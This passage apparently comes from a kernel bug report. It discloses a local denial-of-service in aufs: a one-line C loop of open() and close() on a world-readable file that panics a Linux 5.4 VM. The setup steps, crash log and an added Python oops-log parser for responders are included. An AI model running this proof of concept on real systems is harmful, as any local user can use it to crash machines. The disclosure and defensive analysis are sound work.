The local exploit is trivial: 'mount | grep aufs' shows whether an aufs
mountpoint exists, and usually there is a world-readable ('chmod o+r')
file on it that any user can open.
(This crashed a virtual machine in 8 hours, overnight.)
See section 'Exploit / Local' below.
Exploit / Local:
---
Code:
$ cat <<EOF >exploit.c
#include <fcntl.h>
#include <unistd.h>
/* open() and close() the same file in a tight loop; stop at the first close() failure */
int main() { while (!close(open("test", O_RDONLY))); return 0; }
EOF
$ gcc -o /tmp/exploit exploit.c
Setup:
$ mkdir dir mnt
$ touch dir/test
$ sudo mount -t aufs -o br=dir none mnt
$ ls mnt
test
Run:
$ cd mnt && /tmp/exploit
<just let it run until..>
[29167.866016] kernel BUG at include/linux/fs.h:2963!
[29167.867423] invalid opcode: 0000 [#1] SMP PTI
[29167.868584] CPU: 0 PID: 5314 Comm: exploit Tainted: G OE 5.4.0-21-generic #25-Ubuntu
[29167.870751] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.12.0-1 04/01/2014
[29167.873202] RIP: 0010:__fput+0x25d/0x260
...
[29167.901583] Call Trace:
[29167.902387] ____fput+0xe/0x10
[29167.903344] task_work_run+0x8f/0xb0
[29167.904420] exit_to_usermode_loop+0x131/0x160
[29167.905749] do_syscall_64+0x163/0x190
[29167.906929] entry_SYSCALL_64_after_hwframe+0x44/0xa9
...
[29167.967808] Kernel panic - not syncing: Fatal exception
(uptime = 29167 seconds / 3600 seconds/hour = 8.10 hours)
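As an added example (not part of this report), the following Python parser turns an oops like the one above into the structured fields a responder would alert on (BUG location, crashing PID and comm, kernel version, taint flags, faulting symbol, call trace, whether it ended in a panic) and recomputes the uptime the report derives by hand from the printk timestamp. The sample text is the report's own log lines re-joined, not a fresh capture; the function and regex names are my own.

```python
import re

# Constructed sample: the oops lines from the report above, re-joined.
SAMPLE_OOPS = """\
[29167.866016] kernel BUG at include/linux/fs.h:2963!
[29167.867423] invalid opcode: 0000 [#1] SMP PTI
[29167.868584] CPU: 0 PID: 5314 Comm: exploit Tainted: G OE 5.4.0-21-generic #25-Ubuntu
[29167.870751] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.12.0-1 04/01/2014
[29167.873202] RIP: 0010:__fput+0x25d/0x260
...
[29167.901583] Call Trace:
[29167.902387] ____fput+0xe/0x10
[29167.903344] task_work_run+0x8f/0xb0
[29167.904420] exit_to_usermode_loop+0x131/0x160
[29167.905749] do_syscall_64+0x163/0x190
[29167.906929] entry_SYSCALL_64_after_hwframe+0x44/0xa9
...
[29167.967808] Kernel panic - not syncing: Fatal exception
"""

# printk prefix "[seconds.micros] message"
LINE_RE = re.compile(r"^\[\s*(?P<ts>\d+\.\d+)\]\s*(?P<msg>.*)$")
BUG_RE = re.compile(r"kernel BUG at (?P<file>\S+):(?P<line>\d+)!")
# "Tainted: <flags> <kver> #<build>" or "Not tainted <kver> #<build>"
CPU_RE = re.compile(
    r"CPU: (?P<cpu>\d+) PID: (?P<pid>\d+) Comm: (?P<comm>\S+) "
    r"(?:Tainted: (?P<taint>.*?)|Not tainted)\s+(?P<kver>\d\S*)\s+#"
)
RIP_RE = re.compile(r"RIP: \d+:(?P<sym>[\w.]+)")
# call-trace frame, optionally "? "-prefixed (unreliable frame) or suffixed with "[module]"
FRAME_RE = re.compile(r"^(?:\?\s+)?(?P<sym>[\w.]+)\+0x[0-9a-f]+/0x[0-9a-f]+(?:\s+\[\w+\])?$")


def parse_oops(text):
    """Parse a printk-timestamped oops/panic into a dict; None if no 'kernel BUG at' line."""
    parsed = {"bug_ts": None, "bug_file": None, "bug_line": None, "pid": None,
              "comm": None, "kernel": None, "taint": None, "rip": None,
              "frames": [], "panic": False}
    in_trace = False
    for raw in text.splitlines():
        m = LINE_RE.match(raw)
        if not m:                      # "..." and other non-printk lines are skipped
            continue
        ts, msg = float(m.group("ts")), m.group("msg").strip()
        b = BUG_RE.search(msg)
        if b:
            parsed["bug_ts"] = ts
            parsed["bug_file"], parsed["bug_line"] = b.group("file"), int(b.group("line"))
            continue
        c = CPU_RE.search(msg)
        if c:
            parsed.update(pid=int(c.group("pid")), comm=c.group("comm"),
                          kernel=c.group("kver"), taint=c.group("taint") or "not tainted")
            continue
        r = RIP_RE.search(msg)
        if r:
            parsed["rip"] = r.group("sym")
            continue
        if msg == "Call Trace:":
            in_trace = True
            continue
        if msg.startswith("Kernel panic"):
            parsed["panic"] = True
            in_trace = False
            continue
        if in_trace:
            f = FRAME_RE.match(msg)
            if f:
                parsed["frames"].append(f.group("sym"))
            else:
                in_trace = False       # first non-frame line ends the trace
    return parsed if parsed["bug_file"] is not None else None


def uptime_hours(parsed):
    """Hours since boot when the BUG fired (printk timestamps count from boot)."""
    return round(parsed["bug_ts"] / 3600, 2)


def summarize(parsed):
    """One-line summary suitable for an alert or ticket title."""
    state = "panic" if parsed["panic"] else "oops"
    return (f"{state}: BUG at {parsed['bug_file']}:{parsed['bug_line']} in {parsed['rip']} "
            f"(pid {parsed['pid']} comm {parsed['comm']}, kernel {parsed['kernel']}, "
            f"taint {parsed['taint']}, {uptime_hours(parsed)} h uptime)")


if __name__ == "__main__":
    info = parse_oops(SAMPLE_OOPS)
    print(summarize(info))
    print("call trace:", " <- ".join(info["frames"]))
```

The comm field is what makes this actionable: the kernel records the name of the process that triggered the BUG, so a crash dump or serial console log can be matched back to a user session even when the machine did not survive to be inspected.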